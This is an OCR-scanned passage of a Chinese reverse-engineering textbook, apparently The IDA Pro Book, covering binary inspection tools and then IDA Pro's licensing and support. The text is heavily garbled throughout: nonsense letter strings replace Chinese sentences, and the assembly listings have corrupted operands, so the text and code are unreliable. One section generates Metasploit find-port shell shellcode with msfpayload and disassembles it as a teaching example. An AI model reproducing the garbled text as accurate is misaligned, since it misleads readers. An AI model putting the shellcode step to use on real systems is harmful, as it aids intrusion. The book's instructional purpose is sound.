文件 中 的 哪些 特定 资源 。 因 此 ,与 静态 链接 二 进 制 文件 不 同 , 我 们 可 轻易 确定 一 个 动态 链接 二 进 抽 
文件 所 依赖 的 库 文件 。1dd (list dynamic dependencies ) 是 一 个 简单 的 实用 工具 ， 可 用 来 列举 任何 可 
执行 文件 所 需 的 动态 库 。 在 下 面 这 个 例子 中 ， 我 们 使 用 1dd 确定 Apache Web 服务 器 所 依赖 的 库 。 

















idabook# ldd /usr/local/sbin/httpd 

/usr/local/sbin/httpd: 
libm.so.4 -» /lib/libm.so.4 (0x280c5000) 
libaprutil-1.so.2 => /usr/local/lib/libaprutil-1.so.2 (0x280db000) 
libexpat.so.6 => /usr/local/lib/libexpat.so.6 (0x280ef000) 
libiconv.so.3 => /usr/local/lib/libiconv.so.3 (0x2810d000) 
libapr-1.so.2 => /usr/local/lib/libapr-1.so.2 (0x281fa000) 
libcrypt.so.3 => /lib/libcrypt.so.3 (0x2821a000) 
libpthread.so.2 -» /lib/libpthread.so.2 (0x28232000) 
libc.so.6 -» /lib/libc.so.6 (0x28257000) 

idabookit 


Linux 和 BSD 系统 均 提 供 1dd 工具 ,在 OS X zit fii JH otoo) 工具 ,并 带 上 -L 选项 (otoo1-L 
文件 名 )， 即 可 实现 类 似 的 功能 。 在 Windows 系统 中 ， 可 以 使 用 Visual Studio 工具 套件 中 的 实用 
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工具 dumpbin 列举 某 文件 所 依赖 的 库 ， 形 式 为 : dumpbin /dependents 文件 名 。 
2.2.3 objdump 


与 专用 的 1dd 不 同 ，objdump 的 功能 非常 多 样 。 显 示 与 目标 文件 有 关 的 信息 是 objdump 的 
功能 。 这 是 一 个 相当 宽泛 的 目标 ，objdump 为 此 提供 了 大 量 命令 行 选 项 (超过 30 个 )， 以 提取 
目标 文件 中 的 各 种 信息 。objdump 可 用 于 显示 以 下 与 目标 文件 有 关 的 信息 〈 以 及 其 他 更 多 信 
ER 

D 节 头 部 ， 程 序 文件 每 节 的 摘要 信息 。 

OQ 专用 头 部 , 程序 内 存 分 布 信息 , 还 有 运行 时 加 载 器 所 需 的 其 他 信息 , 包括 由 1dd 等 工具 生 

成 的 库 列 表 。 

口 调试 信息 ， 提 取出 程序 文件 中 的 任何 调试 信息 。 

D 符号 信息 ， 以 类 似 nm 的 方式 转 储 符 号 表 信 息 。 

OQ 反 汇 编 代 码 清单 ，objdump 对 文件 中 标记 为 代码 的 部 分 执行 线性 扫描 反 汇 编 。 反 汇编 x86 

代码 时 ，objdump 可 以 生成 AT&T 或 Intel 语 法 ， 并 可 以 将 反 汇 编 代 码 保 存在 文本 文件 中 。 
这 样 的 文本 文件 叫做 反 汇 编 死 代码 清单 ( dead listing )， 人 尽管 这 些 文件 可 用 于 实施 逆 癌 工 
程 ， 但 它们 很 难 有 效 导 航 ， 也 无 法 以 一 致 旦 无 错 的 方式 被 修改 。 

objdump 是 GNU binutils2 工 具 套件 的 一 部 分 ， 用 户 可 以 在 Linux, FreeBSD 和 Windows (iÑ 
过 Cygwin ) 系统 中 找到 这 个 工具 。objdump 依靠 二 进 制 文件 描述 符 库 libbfd ( 二进制 工具 的 一 个 
组 件 ) 来 访问 目标 文件 ， 因 此 ， 它 能 够 解析 libbfd 支持 的 文件 格式 (ELF、PE 等 )。 另 外 ， 一 个 
名 为 readelf 的 实用 工具 也 可 用 于 解析 ELF 文件 。readelf 的 大 多 数 功能 与 objdump 相同 ， 它 们 
之 间 的 主要 区 别 在 于 readelf 并 不 依赖 libbfd。 









































2.2.4 otool 


otool 可 用 于 解析 与 OS X Mach-O 二 进 制 文件 有 关 的 信息 ， 因 此 ， 可 简单 将 其 描述 为 OS X 
系统 下 的 类 似 于 objdump 的 实用 工具 。 下 面 的 代码 说 明了 如 何 使 用 otool 显示 一 个 Mach-O 二 进 
制 文件 的 动态 库 依 赖 关 系 ， 从 而 执行 类 似 于 1dd 的 功能 。 








idabook# file osx example 

osx example: Mach-O executable ppc 

idabook# otool -L osx example 

osx example: 
/usr/lib/libstdce*.6.dylib (compatibility version 7.0.0, current version 7.4.0) 
/usr/lib/libgcc s.1.dylib (compatibility version 1.0.0, current version 1.0.0) 
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 88.1.5) 


otool 可 用 于 显示 与 文件 的 头 部 和 符号 表 有 天 的 信息 ， 并 对 文件 的 代码 部 分 进行 反 汇 编 。 欲 
了 解 更 多 有 关 otool 功能 的 信息 ， 请 参阅 相关 手册 。 





(D 参见 http://www.gnu.org/software/binutils/。 
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2.2.5 dumpbin 

dumpbin 是 微软 Visual Studio 工具 套件 中 的 一 个 命令 行 实用 工具 。 与 otool 和 objdump 一样 ， 
dumpbin 可 以 显示 大 量 与 Windows PE 文件 有 关 的 信息 。 下面 的 例子 说 明了 如 何 使 用 dumpbin 以 类 
似 于 1dd 的 方式 显示 Windows 计算 器 程序 的 动态 依赖 关系 。 























$ dumpbin /dependents calc.exe 
Microsoft (R) COFF/PE Dumper Version 8.00.50727.762 
Copyright (C) Microsoft Corporation. All rights reserved. 


Dump of file calc.exe 
File Type: EXECUTABLE IMAGE 
Image has the following dependencies: 


SHELL32.d1ll 
msvcrt.dll 
ADVAPI32.dll 
KERNEL32.dll 
GDI32.dll 
USER32.dll 


dumpbin 的 其 他 选项 可 从 PE 二 进 制 文件 的 各 个 部 分 提取 信息 , 包括 符号 、 导 和 的 图 数 名 、 导 
出 的 郴 数 名 和 反 汇 编 代 码 。 谷 了解 更 多 有 关 如 何 使 用 dumpbin 的 信息 ,请 访问 Mircrosoft Developer 
Network ( MSDN IT. 








2.2.0 c+filt 

由 于 每 一 个 重 载 的 图 数 都 使 用 与 原 图 数 相同 的 名 称 , 因此 , 文 持 晒 数 重 载 的 语言 必须 拥有 一 
种 机 制 ， 以 区 分 同一 个 晒 数 的 许多 重 载 版 本 。 下 面 的 C++ 实例 展示 了 一 个 名 为 demo 的 函数 的 几 
个 重 载 厂 本 的 原型 : 





void demo(void); 

void demo(int x); 

void demo(double x); 

void demo(int x, double y); 
void demo(double x, int y); 
void demo(char* str); 


9E, —^ HERFRA REA ANAE KR Ty sch. ML AE LE rm OS 
709 B5 fei A RR IRR AERP, Hm A ER PU E oft — FJ PRU PR o. 2 45 Poo zem IRTHJ PR 
数 生 成 唯一 名 称 的 过 程 叫做 名 称 改 编 (name mangling ) >。 如 果 使 用 nm 转 储 前 面 的 C++ 代码 的 





(D 参见 http://msdn.microsoft.com/en-us/library/clh23y6c(VS.71).aspx。 
D 有 关 名 称 改 编 的 概述 ， 请 参考 htp://en.wikipedia.org/wiki/Name mangling. 
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已 编译 版 本 中 的 全 号 ， 将 得 到 如 下 结 灯 (有 删 减 ， 以 突出 显示 demo 的 重 载 版 本 ): 


idabook# g++ -0 cpp test cpp test.cpp 
idabook# nm cpp test | grep demo 
0804843c T Z4demoPc 

08048400 T Z4demod 

08048428 T Z4demodi 

080483fa T Z4demoi 

08048414 T Z4demoid 

080483f4 T ZA4demov 


C++ 标准 没有 为 名 称 改编 方案 制定 标准 ， 因 此 ， 编 详 希 设计 人 员 必 须 目 己 制定 标准 。 为 了 详 
解 上 面 列 出 的 demo 函数 的 重 载 厂 本 ， 我 们 需要 一 个 能 够 理解 编 详 般 (这 里 为 g) 的 名 称 改编 
方案 的 工具 ，c++filt 正 是 这 样 一 个 实用 工具 。crrfilt 将 每 个 输入 的 名 称 看 成 是 改编 后 的 名 称 
( mangled name )， 并 设法 确定 用 于 生成 该 名 称 的 编 详 带 。 如 果 这 个 名 称 是 一 个 合法 的 改编 名 称 ， 
那么 ，c++filt 就 输出 改编 之 前 的 原始 名 称 ; UMR c++filt 无 法 识别 一 个 改编 名 称 ,， 那 它 就 按 原 样 
输出 该 名 称 。 

如 朱 将 上 面 mm 输出 的 结果 交 给 ct+filt 人 处理， 将 可 以 得 到 这 些 函 数 的 原始 名 称 ， 如 下 所 示 : 








idabook# nm cpp test | grep demo | c++filt 
0804843c T demo(char*) 

08048400 T demo(double) 

08048428 T demo(double, int) 

080483fa T demo(int) 

08048414 T demo(int, double) 

080483f4 T demo() 


值得 注意 的 是 ， 改 编 名 称 可 能 包含 其 他 与 水 数 有 天 的 信息 ， 正 第 情况 下 ，nm 无 法 显示 这 些 
信息 。 在 逆 疝 工程 过 程 中 ,这 些 信息 可 能 非 第 重要 。 在 更 复 淋 的 情况 下 ， 这 些 额 外 信息 中 可 能 还 
] 含 与 类 名 称 或 隆 数 调用 约定 有 关 的 信息 。 


























2.9. RIS TU BR 





到 目前 为 止 , 我 们 已 经 讨论 了 一 些 工 具 , 利用 这 些 工 具 , 可 以 在 对 文件 的 内 部 结构 知之 甚 少 
的 情况 下 对 文件 进行 粗略 分 析 , 也 可 以 在 深入 了 解 文件 的 结构 之 后 ,从 文件 中 提取 出 特定 的 信息 。 
在 这 一 节 中 ， 我 们 将 介绍 一 些 专用 于 从 任何 格式 的 文件 中 提取 出 特定 信息 的 工具 。 











2.3.1 strings 

有 时 候 , jeh FNRA RA AXE, BIS RT; EE TR CHE See BI ol [RAS IR] 
题 ， 对 我 们 会 有 一 定 帮 助 。 例 如 : “这 个 文件 包含 字符 串 吗 ? ”当然 , 在 回答 这 个 问题 之 前 ， 必 须 
先 回答 男 一 个 问题 “到 底 什 么 是 学 符 串 ? ”我 们 将 字符 串 简 单 定 义 为 由 可 打印 字符 组 成 的 连续 











ID IY 


字符 
可 以 


中 搜 


2.3 深度 检测 工具 2] 


序列 。 通 并 ,在 这 一 定义 的 基础 上 ， 还 需要 指定 一 个 最 小 长 度 和 一 个 特定 的 字符 集 。 因 此 ， 
搜索 至 少 包含 4 个 连续 可 打印 ASCI FERFIER, HRANE ATEN A, 搜 
类 字符 串 不 会 受到 文件 结构 的 限制 。 在 ELF 二 进 制 文件 中 搜索 字符 串 就 像 在 微软 Word 文档 
ZR ET FEINT ID. 

strings 实用 工具 专门 用 于 提取 文件 中 的 字符 串 内 容 ， 通 常 ， 使 用 该 工具 不 会 受到 文件 

















格式 的 限制 。 使 用 strings 的 默认 设置 ( 至少 包含 4 个 字符 的 7 位 ASCII 序 列 ), 可 得 到 以 下 


2 


idabook# strings ch2 example 
/lib/ld-linux.so.2 

|. gmon start ` 

libc.so.6 

. IO stdin used 

exit 

srand 

puts 

time 

printf 

stderr 

fwrite 

scanf 

. libc start main 

GLIBC 2.0 

PTRh 

[^ ] 
usage: ch2 example [max] 

A simple guessing game! 

Please guess a number between 1 and Ad. 
Invalid input, quitting! 

Congratulations, you got it in Xd attempt(s)! 
Sorry too low, please try again 

Sorry too high, please try again 


不 过 , 我 们 发 现 , 一 些 字符 串 看 起 来 像 程 序 输出 , 一 些 字符 串 则 像 函 数 名 称 或 库 名 称 。 因此， 








绝 不 
来 推 


能 仅仅 根据 这 些 字 符 串 来 断定 程序 的 功能 。 分析 人 员 往 往 会 挤 入 陷阱 ， 根 据 strings 的 输出 
断 程 序 的 功能 。 需要 记 住 的 是 : 二 进 制 文件 中 包含 某 个 字符 串 ， 并 不 表示 该 文件 会 以 某 种 方 





式 使 用 这 个 字符 串 。 





下 面 是 使 用 strings 时 的 一 些 注意 事项 。 

口 需要 牢记 的 是 ， 使 用 strings 处 理 可 执行 文件 时 ， 软 认 情 况 下 ，strings 仅仅 扫 擂 文件 中 
可 加 载 的 、 经 初始 化 的 部 分 。 使 用 命令 行 参数 -a 可 强制 strings 扫描 整个 文件 。 

O strings 不 会 指出 字符 串 在 文件 中 的 位 置 。 使 用 命令 行 参 数 -t 可 令 strings 显示 所 发 现 的 
每 一 个 字符 串 的 文件 偏 移 量 信 息 。 

a 许多 文件 使 用 了 其 他 字符 集 。 使 用 命令 行 参 数 -e 可 使 strings 搜索 更 广泛 的 字符 ， 如 16 
位 Unicode 字符 。 
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2.3.2 WLR 


有 前面 介绍 过 ， 有 很 多 工具 都 可 以 生成 二 进 制 目标 文件 的 死 代码 清单 形式 的 反 汇 编 代 人 码 。PE、 
r T clap 进行 反 汇 编 。 但 是 , 它们 中 的 任何 
一 个 都 无 法 处 理 任意 格式 的 二 进 制 数据 块 。 有 时 候 , 你 会 遇 到 一 些 并 不 采用 和 用 文件 格式 的 二 进 

制 文件 ， 在 这 种 情况 下 ， 你 就 需要 一 些 能 够 从 用 户 指定 的 偶 移 量 开 始 反 汇编 过 程 的 工具 。 

有 两 个 用 于 x86 指令 集 的 流 式 反 汇编 器 (stream disassembler ): ndisasm 和 diStorm" , ndisasm 
是 Netwide Assembler ( NASM ) “中 的 一 个 工具 。 下 面 的 例子 说 明了 如 何 使 用 ndisasm 反 汇 编 一 
段 由 Metasploit 框架 ”生成 的 shellcode: 

idabook# ./msfpayload linux/x86/shell findport CPORT=4444 R > fs 

idabooks ls -1 fs 


-IW-I--r-- 1 ida ida 62 Dec 11 15:49 fs 
idabooktt ndisasm -u fs 





00000000 31D2 xor edx,edx 

00000002 52 push edx 

00000003 89E5 mov ebp,esp 

00000005 6A07 push byte +0x7 
00000007 5B pop ebx 

00000008 6A10 push byte «0x10 
0000000A 54 push esp 

0000000B 55 push ebp 

0000000C 52 push edx 

0000000D 89E1 mov ecx,esp 

0000000F FF01 inc dword [ecx] 
00000011 6A66 push byte 40x66 
00000013 58 pop eax 

00000014 CD80 int Ox80 

00000016  66817D02115C cmp word [ebps0ox2],0x5c11 
0000001C 75F1 jnz Oxf 

0000001E 5B pop ebx 

0000001F  6A02 push byte «0x2 
00000021 59 pop ecx 

00000022 BO03F mov al,Ox3f 

00000024 CD80 int Ox80 

00000026 49 dec ecx 

00000027 79F9 jns 0x22 

00000029 52 push edx 

0000002A  682F2F7368 push dword 0x68732f2f 
0000002F  682F62696E push dword 0x6e69622f 
00000034 89E3 mov ebx,esp 

00000036 52 push edx 

00000037 53 push ebx 

00000038 89E1 mov ecx,esp 


D 参见 http://www.ragestorm.net/distorm/.; 
(2 参见 http://nasm.sourceforge.net/. 
(3) 参见 http://www.metasploit.com/; 
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0000003A BOOB mov al, oxb 
0000003C CD80 int Ox80 


由 于 流 式 反 汇编 非常 灵活 ， 因 此 它 的 用 途 相 当 广 泛 。 例 如 ， 在 分 析 网 络 数据 包 中 可 能 包含 
shellcode 的 计算 机 网 络 攻 击 时 ， 就 可 以 采用 流 式 反 汇 编 融 来 反 汇 编 数 据 包 中 包含 shellcode 的 部 
分 ， 以 分 析 恶 意 负载 的 行为 。 另 外 一 种 情况 是 分 析 那 些 不 包含 布局 参考 的 ROM 镜像 。ROM 中 
有 些 部 分 是 数据 ， 其 他 部 分 则 为 代码 ， 可 以 使 用 流 式 反 汇 编 圳 来 反 汇 编 镜 像 中 的 代码 。 





2.4 小结 


本 章 所 讨论 的 工具 不 一 EARRA 秀 的 , 但 是 , 它们 是 从 事 二 进 制 文件 逆 回 工程 的 分 析 
人 员 第 用 的 工具 。 TERNE, 这 些 工具 大 大 促进 了 IDA 的 开发 过 程 。 在 接 下 来 的 几 章 中 ,我 
们 还 会 讨论 这 些 工 具 。 和 党 握 这 些 工 具 可 为 你 了 解 IDA 的 用 户 界面 以 及 显示 它 提 供 的 许多 信息 提 
供 极 大 的 帮助 。 





























ES EARKI 8:8 VJ (Interactive Disassembler Professional ), ANTH $K7J IDA Pro, 或 

一 人 简称 为 IDA， 是 总 部 位 于 比利时 列 日 市 (Liege ) 的 Hex-Rays? 公 司 销售 的 一 款 产品 。 
开发 IDA 的 编程 天 才 名 叫 Ilfak Guilfanov， 人 们 第 叫 他 Itfak。 干 多 年 前 诞生 时 ，IDA 还 是 一 个 基 
于 控制 台 的 MS-DOS 应 用 程序 ， 这 一 点 很 重要 ， 因 为 它 有 助 于 我 们 理解 IDA 用 户 界面 的 本 质 。 
除 其 他 内 容 外 , IDA 的 非 GUI 版 本 是 针对 所 有 IDA 支持 的 平台 ?发 布 的 , 并 且 继 续 采 用 源 于 最 初 
DOS 版 本 的 控制 台 形 式 的 界面 。 

就 其 本 质 而 言 ，IDA 是 一 种 递归 下 降 反 汇编 费 。 但 是 ， 为 了 提高 递归 下 降 过 程 的 效率 ，IDA 
的 开发 者 付出 了 巨大 的 努力 ,来 为 这 个 过 程 开 发 逻辑 。 为 了 交 服 递归 下 降 的 一 个 最 大 的 缺点 , IDA 
应 用 大 量 启发 式 技术 来 识别 那些 在 递归 下 降 过 程 中 遗漏 的 代码 。 除 反 汇 编 过 程 本 身 外 , IDA 在 区 
分 数据 与 代码 的 同时 ， 还 设法 确定 这 些 数据 的 类 型 。 虽 然 你 在 IDA 中 看 到 的 是 汇编 语言 形式 的 
代码 , 但 IDA 的 主要 目标 之 一 在 于 ， 呈 现 尽 可 能 接近 源 代码 的 代码 。 此 外 ，IDA 不 仅 使 用 数据 
类 型 信息 , 而 且 通 过 派生 的 变量 和 浮 数 名 称 来 尽 其 所 能 地 注释 生成 的 反 汇 编 代码 。 这 些 注释 将 原 
始 十 六 进 制 代码 的 数量 减 到 最 少 ， 并 显著 增加 了 向 用 户 提供 的 符号 化 信息 的 数量 。 


3.1 Hex-Rays 公司 的 反 盗 版 策略 


IDA 用 户 应 了 解 以 下 几 项 事实 。IDA 是 Hex-Rays 公司 的 旗舰 产品 。 因 此 ， 他 们 对 于 未 经 授 
权 就 使 用 IDA 的 做 法 深恶痛绝 。 过 去 ， 该 公司 发 现 ， 盗 版 IDA 的 发 布 与 公司 销售 量 的 下 滑 有 着 
直接 的 因果 关系 。 为 此 ，IDA 的 前 发 行 公司 DataRescue 甚至 将 盗版 者 的 姓名 张贴 在 它 的 “耻辱 
堂 ”( Hall of Shame) “中 。 为 打击 盗版 ，IDA 采用 了 几 项 反 资 版 技术 ， 并 实施 了 许可 限制 。 

用 户 需 要 了 解 的 第 一 种 技术 是 : 每 一 份 IDA 都 带 有 水 印 , 以 将 它 与 购买 者 一 对 一 地 对 应 起 来 。 
如 果 一 份 DA 出 现在 盗版 软件 站 点 中 ，Hex-Rays 就 能 够 通过 水 印 追 踪 到 购买 者 ,并 将 其 列 和 人 销售 
黑 名 单 。 我 们 和 常 第 可 以 在 Hex-Rays 的 IDA 支持 论坛 上 发 现 有 关 IDA 的 “泄露 ”版 本 的 讨论 。 












































(多 年 来 ， IDA 一 直 由 DataRescue 公司 销售 。 但 自 2008 年 1 月 ,Tlfak 开始 通过 他 自己 的 公司 Hex-Rays 推广 和 销售 
IDA; 

(2 目前 支持 的 平台 是 Windows, Linnux fll OSX。 

OB HE” CFA] Hex-Rays 的 网 站 : http:/www.hex-rays.comryidapro/hallofshame.html。 
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为 实施 许可 策略 ，IDA 采用 的 另 一 种 技术 是 扫描 在 局 域 网 中 运行 的 其 他 IDA 程序 。 例 如 ， 

Windows 版 本 的 IDA 启动 后 ， 它 会 在 端口 23945 上 广播 一 个 UDP 包 ， 并 等 待 响应 ， 看 相同 子 网 
是 否 有 其 他 使 用 相同 许可 证 密 钥 的 IDA 实例 在 运行 。 然 后 ，IDA 会 将 得 到 的 响应 数量 与 使 用 
该 许可 证 的 用 户 的 数量 进行 比较 ， 如 果 发 现 网 络 中 存在 过 多 的 IDA 实例 ，IDA 会 拒绝 启动 。 但 
是 要 注意 ， 用 户 可 以 在 一 台 计 算 机 上 使 用 相同 的 许可 证 运行 多 个 IDA. 实例 。 

IDA 实施 许可 策略 的 最 后 一 种 方法 是 , 使 用 密 钥 文件 将 每 一 名 购买 者 与 产品 联系 起 来 。 在 启 
动 时 ，IDA 会 搜索 一 个 有 效 的 ida.key 文件 。 如 果 无 法 定位 有 效 的 密 钥 文 件 ，IDA 就 会 立即 关闭 。 
密 钥 文件 还 用 于 确定 用 户 升级 IDA 的 资格 。 基 本 上 ，ida.key 文件 就 像 是 用 户 的 购买 收据 ， 要 想 
在 将 来 获得 升级 资格 ， 用 户 必 须 保管 好 这 个 文件 。 
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首先 , 也 是 最 重要 的 是 , IDA 并 非 免 费 软 件 。 从 某 种 程度 上 说 ，Hex-Rays 的 员 工 要 靠 卖 IDA 
来 开工 资 。 不 过 ，Hex-Rays 为 希望 了 解 IDA 基本 功能 的 用 户 提供 了 一 个 功能 有 限 的 免费 版 本 ”， 
但 是 , 该 免费 版 本 并 不 提供 最 新 版 本 的 功能 。 该 免费 版 本 为 IDA 5.0 € 当前 版 本 为 6.1 ) 的 简化 版 ， 
我 们 将 在 附录 A 中 详细 介绍 这 个 免费 版 本 。 除 免费 版 本 外 ，Hex-Rays 还 提供 当前 版 本 的 功能 
限 的 演示 版 ?。 如 果 你 在 讨论 逆向 工程 的 地 方 发 现 的 对 于 IDA 的 称赞 尚 不 足以 吸引 你 购买 IDA， 
那么 ， 花 一 些 时 间 熟 悉 免费 版 或 演示 版 的 功能 ， 将 有 助 于 你 了 解 IDA. 的 强大 功能 及 周到 的 客户 
服务 ， 促 使 你 购买 这 一 产品 。 















































3.2.1 IDA 版 本 


从 版 本 6.0 开始，IDA 可 以 在 Windows, Linux 和 OS X 的 GUI 和 控制 台 界面 中 使 用 。IDA 
利用 Qt 的 跨 平 台 GUI 库 在 上 述 三 个 平台 上 提供 一 致 的 用 户 界面 。 从 功能 上 看 ，IDA Pro 共有 标 
准 版 和 高 级 版 两 个 版 本 。 这 两 个 版 本 的 主要 区 别 , 在 于 它们 文 持 反 汇 编 的 处 理 需 体系 结构 数量 不 
同 。 人 快速 浏览 一 下 它们 所 支持 的 处 理 需 体系 结构 列表 ”， 即 可 发 现 : 标准 版 (写作 本 书 时 售 价 约 
为 540 美元 ) 支持 30 多 种 处 理 器 ， 而 高 级 版 (价格 几乎 是 标准 版 的 两 倍 ) 则 支持 50 多 种 处 理 需 。 
高 级 版 支持 的 其 他 体系 结构 包括 x64、AMD64、MIPS、PPC 和 SPARC 等 。 














3.2.2 ”IDA 许可 证 


在 购买 IDA 时 ， 用 户 可 以 选择 两 种 许可 证 。Hex-Ravys 网 站 “ 称 :“ 已 命名 许可 证 (named 
license) 与 某 一 特定 的 最 终 用 户 有 关 ， 可 安装 到 该 用 户 使 用 的 任意 多 个 计算 机 上 。 而 计算 机 许可 
证 则 与 某 一 台 特 定 的 计算 机 有 关 , 任何 使 用 该 计算 机 的 用 户 都 可 以 使 用 这 种 许可 证 , 但 一 次 只 能 














(D 参见 http://www.hex-rays.com/idapro/idadownfreeware.htm. 
(2) 参见 http://www.hex-rays.com/idapro/idadowndemo.htm. 
(3) 参见 http://www.hex-rays.com/idapro/idaproc.htm., 

(4) 参见 http://www.hex-rays.com/idapro/idaorder.htm. 
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有 一 名 用 户 使 用 该 许可 证 。” 注意 ， 虽 然 已 命名 许可 证 可 以 让 你 在 任意 多 个 计算 机 上 安装 IDA Sr 
件 ， 但 只 有 你 才能 运行 这 些 IDA. 软件 。 而 且 ， 对 于 单个 许可 证 ， 在 某 一 给 定时 刻 ，IDA 只 能 在 
其 中 一 人 台 计 算 机 上 运行 。 





说 明 D0000000000000000mDAO000000000000 IPAOOOODODO 
UUUL 


3.2.89 ”购买 IDA 


在 版 本 6.0 之 前 ， 用 户 购 买 的 IDA 包括 一 个 Windows GUI 版 本 及 用 于 Windows, Linux 和 
OS X 的 控制 台 版 本 。 从 版 本 6.0 开始 ， 购 买 者 必须 具体 指定 他 们 希望 运行 IDA 的 操作 系统 。 
个 IDA 6.x 的 副本 仪 提供 指定 操作 系统 的 控制 台 和 基于 Qt 的 GUI 版 本 。 如 果 用 户 需 要 购买 针对 
备用 操作 系统 的 其 他 许可 证 ，Hex-Rays 将 给 予 价格 优惠 。 用 户 可 以 从 IDA 销售 网 页 上 列 出 的 授 
权 分 销 商 那里 购买 IDA， 或 者 通过 传真 或 电子 邮件 直接 回 Hex-Rays 购买 。 购 买 后 ， 用 户 可 获得 
产品 光盘 或 下 载 版 本 的 软件 ， 并 且 可 获得 一 年 的 免费 产品 服务 和 升级 。 除 IDA 安装 程序 外 ， 产 
品 光 盘 中 还 包括 IDA SDK 以 及 其 他 实用 工具 。 通 弟 ， 选 择 以 下 载 方式 购买 IDA 的 用 户 只 能 获得 
IDA 的 安装 程序 ， 并 需要 单独 下 载 其 他 组 件 。 

一 直 以 来 , Hex-Rays 根据 IDA 在 各 国 的 盗版 情况 , 将 IDA. 的 销售 限制 在 特定 的 一 些 国家 。 对 
于 违反 IDA 许可 证 条 款 的 用 户 ， 它 还 保留 有 一 份 黑 名 单 ， 并 拒绝 与 这 些 用 户 及 其 雇主 开展 业务 。 





























3.2.4 升级 IDA 


IDAHelp (帮助 ) 菜单 包括 一 个 用 于 检查 可 用 升级 的 选项 。 此 外 ，IDA 会 根据 你 的 密 钥 文件 
中 的 过 期 日 期 自动 向 你 发 出 警告 ， 提 示 你 IDA 即将 过 期 。 一 般 情 况 下 ， 在 升级 过 程 中 ， 用 户 必 
须 向 Hex-Rays 提交 ida.key 文件 。 然 后，Hex-Rays 会 验证 用 户 的 密 钥 ， 并 提供 如 何 获得 升级 版 本 
的 详细 信息 。 如 果 你 发 现 你 的 IDA 版 本 过 低 ， 没 有 升级 资格 ， 请 记得 利用 Hex-Rays 向 密 钥 过 期 
的 用 户 提供 的 折扣 升级 价格 。 








Sa DDDDDDDDDDDDDmDDDDDDDDDDDDD0DDDDIm0DDDDDDDU DAD 


最 后 ， 强 烈 建议 在 升级 IDA 时 备份 现 有 的 IDA 版 本 ,或 将 升级 版 本 安装 到 一 个 完全 不 同 的 
目录 ,以 避免 丢失 你 修改 的 任何 配置 文件 。 为 了 恢复 你 之 前 所 做 的 任何 修改 ,你 可 能 需要 编辑 升 
级 版 本 中 的 相应 文件 。 同 样 ， 你 还 需要 移动 、 重 新 编译 或 以 其 他 形式 获得 新 版 的 日 定义 IDA. Ji 
fr (请 参阅 第 17 章 了解 有 关 捅 件 及 其 安装 的 详细 信息 )。 


3.3 IDA 支持 资源 
作为 一 名 IDA 用 户 , 你 可 能 想 知 道 ， 如 果 遇 到 与 IDA 有 关 的 问题 , 该 从 什么 地 方 寻求 帮助 。 
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如 采 我 们 做 得 还 不 错 的 话 ， 本 书 也 许 能 够 解决 用 户 直 到 的 大 多 数 问题 。 如 果 你 需要 额外 的 帮助 ， 
请 参考 下 面 一 些 常 用 的 资源 。 

口 正式 的 帮助 文档 。IDA 确实 提供 了 通过 采 单 激活 的 ( menu-activated ) 帮助 系统 ， 但 是 ， 
该 文档 主要 介绍 IDA 的 用 户 界 面 和 脚本 子 系统 ， 它 对 于 我 们 了解 IDASDK 以 及 解决 类 似 
于 “我 该 如 何 处 理 ……” 的 问题 并 没有 多 大 帮助 。 

O Hex-Rays 的 支持 页 面 和 论坛 。 Hex-Rays 运行 着 一 个 支持 页 面 ", 提供 各 种 与 IDA 有 关 的 
资源 的 链接 ， 包 括 针 对 得 到 许可 证 的 用 户 的 在 线 论坛 。 用 户 会 发 现 ，Ilfak 和 Hex-Rays 
的 其 他 核心 程序 员 经 常 访问 这 些 论坛 , 解答 问题 。 用 户 可 以 通过 这 些 论坛 获得 SDK 方面 
的 非 正式 支持 ， 因 为 在 这 里 ， 有 许多 经 验 丰 定 的 IDA 用 户 乐 于 根据 他 们 目 己 的 经 验 为 大 
家 提供 帮助 。 

有 关 如 何 使 用 SDK 的 问题 ， 人 们 常常 会 告诉 你 “阅读 包含 文件 ”。 但 是 ， 购 买 IDA 产 
品 ， 并 不 能 获得 SDK 方面 的 正式 支持 。 不 过 ，Hex-Rays 倒是 提供 一 个 年 度 支 持 计划 ， 每 年 
收费 10000 美元 (是 真 的 ，10 000 美 元 ), 要 想 了 解 SDK, Steve Micallef 的 著作 IDA Plug-in 
Writing in C/C++ 是 一 个 非常 有 用 的 资源 。 

O openRCE.org。http://www.openrce.org/ 是 一 个 活跃 的 逆 问 工程 社区 ， 其 中 包含 大 量 介绍 
IDA 应 用 的 文章， 以 及 一 些 活 跃 用 户 论 坛 。 与 Hex-Rays 网 站 上 的 论坛 类 似 ，openRCE.org 
也 吸引 了 许多 经 验 丰 宦 的 DA 用 户 ， 他 们 党 在 论坛 上 与 其 他 用 户 彼 此 交流 、 分 至 经 验 ， 
也 许 能 帮助 你 解决 在 使 用 IDA 时 遇 到 的 问题 。 

O RCE 论坛 。 逆 回 代 码 工 程 ( RCE) 论坛 (http:/www.woodmann.com/ ) 中 包含 大 量 与 使 用 
IDA Pro 有 关 的 帖子 。 这 个 论坛 的 内 容 非 党 广泛 ， 其 主题 不 仅 涉及 如 何 使 用 IDA Pro, m 
上 且 亢 兰 了 许多 用 于 对 二 进 制 文件 进行 逆 回 工程 的 工具 和 技巧 。 

Q IDA Palace。 虽 然 最 近 IDA Palace ”的 人 气 已 经 明显 不 如 从 前 ， 但 是 ， 它 仍然 是 一 个 专门 
提供 IDA 相关 资源 的 网 站 。 在 这 个 网 站 上 ， 访 问 者 可 以 找到 大 量 介绍 如 何 使 用 IDA 的 文 
章 的 链接 ， 以 及 用 于 扩展 IDA 功能 的 脚本 和 插件 。 

O llfak 的 博客 。 Tlfak 的 博客 "中 包含 许多 详细 介绍 IDA 用 法 的 文章 , 可 帮助 用 户 解决 通用 反 
汇编 、 调 试 及 恶意 软件 分 析 等 各 种 问题 。 此 外 ， 其 他 Hex-Rays 团队 成 员 发 的 帖子 通常 会 
话 细 介绍 一 些 最 新 的 IDA 功能 ， 以 及 正在 开发 的 功能 。 









































3.4 SS IDA 


Mules IDA 光盘 的 兴奋 中 平静 下 来 后 ， 开 始 安装 IDA 吧 。 你 会 看 到 ， 光 盘 中 包含 两 
个 名 为 utilities 和 sdk 的 目录 ， 其 中 分 别 是 各 种 附加 实用 工具 和 IDA 软件 开发 套件 ( 这 些 内 容 将 








(D 参见 http://www.hex-rays.com/idapro/idasupport.htm. 

(2) 参见 http://www.binarypool.com/idapluginwriting/idapw.pdf. 
(3) 参见 http://old.idapalace.net/. 

(4) 参见 http://www.hexblog.com/; 
